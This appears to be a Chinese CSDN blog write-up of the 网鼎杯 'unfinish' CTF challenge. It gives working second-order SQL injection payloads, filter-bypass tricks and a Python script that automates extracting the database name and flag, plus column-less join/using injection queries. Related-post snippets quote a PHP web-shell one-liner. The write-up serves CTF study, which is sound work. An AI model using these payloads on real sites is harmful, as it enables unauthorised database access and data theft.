unfinish ctf 网鼎杯二次注入 无列名注入join-using

已于 2024-08-06 01:27:03 修改
阅读量631 收藏 11
点赞数 19
文章标签: 数据库
于 2024-08-06 01:24:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_65785894/article/details/140939445
版权

目录

unfinish ctf 网鼎杯二次注入 

1、首先需要注册用户

2、正常登录自己的用户 结果发现数据回显 用户名  那这样我们就可以使用二次注入来解决问题

3、我们尝试注入一次试试会不会回显数据

所以我们开始注入

1、逗号 "," 被过滤 就不能通过ascii 来爆出数据库名称 (我们可以用from for 替换)

2、这样的方法可以把数据爆出来,但是太麻烦,用16进制将所有字母转换成数字 遇到中间有字母的(会被截断)

3、但是 数据一但长了,就会显示科学计数法,将字符串截取被转换的前十位 截取一部分转换16进制

4,接下来通过爬虫的方式,将数据整出来

无列名注入join-using 

unfinish ctf 网鼎杯二次注入 

BUUCTF在线评测

找到之后我们就可以开始了

1、首先需要注册用户

绕过一些字符 一个一个试很麻烦,需要整理一些字符 (可以去 fuzz字典 查看)

bp的爆破模块 200 是被过滤的 所以说information ,也被过滤掉了

我们通过awvs扫描得知存在 register.php 注册页面

2、正常登录自己的用户 结果发现数据回显 用户名  那这样我们就可以使用二次注入来解决问题

3、我们尝试注入一次试试会不会回显数据

很明显数据回显 二次注入

所以我们开始注入

我们不知道什么符号过滤了(绕过一些字符 一个一个试很麻烦,需要整理一些字符 (可以去 fuzz字典 查看))

通过bp软件扫描一下 (我们发现200 过滤了 ,#)

‘#’被过滤很麻烦,因为sql注入 后面需要注释一些字符

想到 mysql ‘+’可以当作数学里的加号来使用 那么就有了解决问题的办法

select '1' + '0'

通过 + 来 连接 asc码来报出数据库名

1、逗号 "," 被过滤 就不能通过ascii 来爆出数据库名称 (我们可以用from for 替换)

0' + ascii(substr(database()from 1 for 1)) + '0

119转义对应的w 

成功回显管理员第一个字母w,当然后面可以多次注入,最后拼接数据库名为web,表名我们直接就猜flag了,当然你也可以通过mysql默认的sys去进行注入出来因为information被禁用了

2、这样的方法可以把数据爆出来,但是太麻烦,用16进制将所有字母转换成数字 遇到中间有字母的(会被截断)

        比如说 flag 转义是 666c6167

        但是一加之后就只会显示出666 这条数据

        所以需要hex(hex())这样就不会出现字母截断的效果了

        

3、但是 数据一但长了,就会显示科学计数法,将字符串截取被转换的前十位 截取一部分转换16进制

4,接下来通过爬虫的方式,将数据整出来

import requests
import time
from bs4 import BeautifulSoup       #html解析器
 
def getDatabase():
    database = ''
    for i in range(10):
        data_database = {
            'username':"0'+ascii(substr((select database()) from "+str(i+1)+" for 1))+'0",
            'password':'admin',
            "email":"admin11@admin.com"+str(i)
        }
        #注册
        requests.post("http://220.249.52.133:36774/register.php",data_database)
        login_data={
            'password':'admin',
            "email":"admin11@admin.com"+str(i)
        }
        response=requests.post("http://220.249.52.133:36774/login.php",login_data)
        html=response.text                  #返回的页面
        soup=BeautifulSoup(html,'html.parser')
        getUsername=soup.find_all('span')[0]#获取用户名
        username=getUsername.text
        if int(username)==0:
            break
        database+=chr(int(username))
    return database
 
def getFlag():
    flag = ''
    for i in range(40):
        data_flag = {
            'username':"0'+ascii(substr((select * from flag) from "+str(i+1)+" for 1))+'0",
            'password':'admin',
            "email":"admin32@admin.com"+str(i)
        }
        #注册
        requests.post("http://220.249.52.133:36774/register.php",data_flag)
        login_data={
            'password':'admin',
            "email":"admin32@admin.com"+str(i)
        }
        response=requests.post("http://220.249.52.133:36774/login.php",login_data)
        html=response.text                  #返回的页面
        soup=BeautifulSoup(html,'html.parser')
        getUsername=soup.find_all('span')[0]#获取用户名
        username=getUsername.text
        if int(username)==0:
            break
        flag+=chr(int(username))
    return flag
 
print(getDatabase())
print(getFlag())

结束

无列名注入join-using 

当我们用sql注入的时候,information_schema 库里 tables 存放数据库所有的库 表 列 和一些基本信息

select table_name from information_schema.tables where table_schema='security';

我们就查到了security中的表

现在限制了information 过滤和忽略大小写  这样又怎么查你想要的表里面的数据呢

information被过滤掉之后,我们只能换方法,看看,其他库里还能不能拿到我们想要的数据

我们去看一看sys数据库

但是 里面并没有我们想要的结果 只有一些表的信息,没有列名的表

sys.schema_auto_increment_columns
sys.schema_table_statistics_with_buffer
musql.innodb_table_stats
mysql.innodb_table_index

所以我们只能找寻其他方法 无列明注入

无列明注入 join-using (as 是 起别名 using是排除id这列还有没有其他列名)

select * from (select * from users as a join users b) c;
select * from (select * from users as a join users b using(id)) c;
select * from (select * from users as a join users b using(id,username)) c;

但是在 php 7 版本之后出现 pdo 从底层解决 mysql注入威胁

pheromone360
关注
6-XCTF-Web-unfinish二次注入
cquptcqupt的博客
08-17 332
这里写目录标题一、二级目录三级目录 一、 二级目录 三级目录
【复习】BUUCTF:[网鼎杯2018]Unfinish --- python爬虫 + re sql注入,substr二次注入,hex二次注入 不用bool注入点的substr
Zero_Adam的博客
05-04 1323
目录:一、自己做:二、学到的三、 学习WPpython爬虫 + re 尝试(尝试思路,):1. substr思路:最后的payloadhex思路: 一、自己做: 测试,看到用户名有回显,那么就是又一次从数据库中查询数据,可能有SQL注入的可能,然后我在注册用户名的时候,加上了 ',然后就死活注册不了,, 也不给我报错,,我在这里也想了一会,,想不明白 后来想到了,可能是报错,然后就没执行,然后我用了万能密码来的。 用户名:a'1 or '1。 你注册成功后,他就会自动跳转到login.php的。 然后用邮箱
CTFunfinish
qq_74263993的博客
03-25 344
然后对username进行注入,尝试了1' or 2=2# ,1' or 2=2--+,1' and 2=2# ,1' or 2=2 --+,1' or '2'='2# .。等等都没有用,最后发现一个1' and '0 注入成功了回显了0,说明还是存在注入的,所以要好好利用这个0。来获得表了,可是这个语法只会得到0,那么我们就要改进一下了。现在难点来了,语句后面加不了注释符,导致我们之前很多盲注语句使用不了,因为无法闭合后面。用工具扫了一下,发现是sql注入漏洞并且注入点是username。
BUUCTF [网鼎杯 2020 青龙组]singal(angr)
最新发布
liulala987的博客
08-28 233
通常用于文件或套接字,而不是直接用于字符串。: 跳过当前指令(即不执行任何操作,只增加索引)。(下一个数组元素,作为操作数)与。执行减一和加一操作,并更新索引。函数(这里可能是个错误,因为。中,并跳过下一个数组元素。中,并跳过下一个数组元素。中,并跳过下一个数组元素。中,并跳过下一个数组元素。,则打印错误消息并退出程序。继续跟进vm_operad。的低字节,结果存储在。: 执行条件检查,如果。: 执行加法操作,将。: 执行减法操作,从。: 执行异或操作,将。: 执行乘法操作,将。索引处,并更新索引。
CTF学习 - [Unfinished] - DEADFACE 2021
Tom_Blibe的博客
03-02 139
可以实现各种类型的数据转换、密码解析等功能,也可以在CyberChef侧边栏搜索magic方法, 自动进行文本识别与可能的数据转换。2. 使用python中的binascii库的unhexlify(去十六进制化),用utf-8标准解码。题目:这段python代码似乎有些问题,修改代码让它返回正确的flag。3. 将十六进制字符转换为ASCII字符, 得到flag。1. 题目中已经给出flag的十六进制字符串。解题关键:十六进制转ASCII。
xctf攻防世界 Web高手进阶区 unfinish
l8947943的博客
01-02 4110
1. 进入环境,查看页面 我的心情和这个图像一样懵逼,拿起dirsearch就是一顿乱扫。如图: 发现有register.php 2. 问题分析 登入register.php,注册相关账户并登录 直接吧usrname给显示出来了,也就是说,注册提交了usrname数据,然后又从数据库中查询了username并回显,那么问题就清晰了一丢丢,想办法通过username注入数据,在回显时候再执行。查了查相关的wp,这种方式叫做二次注入二次注入的原理,在第一次进行数据库插入数据的时候(注册时),仅
BUUCTF--[网鼎杯2018]Unfinish
qq_46263951的博客
07-14 831
首先进入页面后我们发现有两个输入框,简单尝试后并没有发现可用漏洞,使用dirsearch扫描后找到一个register.php 进入register.php我们可以进行注册,成功注册后可以发现登录进去后账户名显示出来了,推测存在二次注入 方法一: HEX:返回十六进制数值表示形式 import requests login_url='http://220.249.52.133:39445/login.php' register_url='http://220.249.52.133:39.
[网鼎杯 2018]unfinish.md
09-05
[网鼎杯 2018]unfinish.md
网鼎杯2018:登录页面SQL注入分析
"[网鼎杯 2018]unfinish.md" 这篇描述涉及到的是一个网络安全竞赛中的CTF(Capture The Flag)挑战,特别是关于SQL注入的题目。题目中给出的场景是一个登录页面`/login.php`,并且推测有一个注册页面`/register....
攻防世界 web高手进阶区 6分题(ics-07、unfinish、i-got-id-200)
闵行小鱼塘
08-02 857
继续ctf的旅程,攻防世界web高手进阶区的6分题:ics-07、unfinish、i-got-id-200
网络安全的“奥运会”——第三届“网鼎杯”网络安全大赛即将开幕
ichunqiu2018的博客
06-22 1612
#网络安全“奥运会”来了! 乘风破浪潮头立,为国铸鼎正当时!由公安部指导,“政产学研用”各领域权威共襄盛举的第三届“网鼎杯”网络安全大赛如约而至,欢迎各行业各领域积极报名参与,报名链接https://www.wangdingcup.com...
网鼎杯密码题
05-01
网鼎杯密码题chaoyang.txt,加密方式暂不说,想知道解题流程可以讨论
2020网鼎杯.zip
07-20
2020网鼎杯 逆向 pwn 密码 隐写赛题,除web外均有
buuctf namp网鼎杯
ANYOUZHEN的博客
06-02 219
输入127.0.0.1,得到界面根据题目namp得知是命令执行,输入127.0.0.1 | ls输入127.0.0.1 | ls发现分号也被转义了,那就很难使用命令执行了尝试输入一句话木马: 发现8行后端应该是做了限制,尝试修改文件名后缀为 得到扫描结果 查看写入的文件,即访问成功上传,一剑连接一下看看得到flag
网鼎杯-nmap
szgyunyun的博客
05-25 495
Web 0x01 nmap 查看源码提示: 研究了半天分隔符绕过,后来放弃了,根据题目提示(127.0.01,不用扫外网),尝试扫描/flag并尝试将其输出到1.txt中 -iL /flag -oN 1.txt 尝试失败之后继续尝试闭合一下 127.0.0.1' -iL /flag -oN szgyy.txt ' 传马 ' <?php @eval($_POST["mazi"]);?> -oG mazi.php ' ' <?= @eval($_POST["password"]);?&gt
PWN 网鼎杯 GUESS
SsMing的博客
09-11 1812
拖了好久才看题,中间去参加比赛去了,休息够了开始学习啦! GUESS 在checksec查看后,发现开了canary 和 NX保护,所以可以用 stack smash 来做这个题 ida打开,查看一下源代码: 发现程序自己把读取flag到了栈中,所以思路就是: 1.通过覆盖argv[0]先泄露puts的地址 2.通过泄漏的puts的地址,计算出基地址然后泄漏出environ的...
网鼎杯-phpweb
szgyunyun的博客
05-25 349
找了一些php读取文件的函数尝试读取源码,试了一个readfile就成功了 <?php $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_
网鼎杯 babyheap
MozhuCY的博客
09-21 911
网鼎杯第一场 程序功能:新建,编辑,打印,free free处没有置空指针,导致可以uaf malloc每次都是0x20的fastbin,编辑功能可以使用3次 自写了readn函数,没有溢出点 edit可以修改free后堆块的bk,fd 1 2 3 4 5 Arch: amd64-64-little RELRO: Full RELRO S...
网鼎杯初赛--web1
unexpectedthing的博客
08-29 697
2022网鼎杯初赛web
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值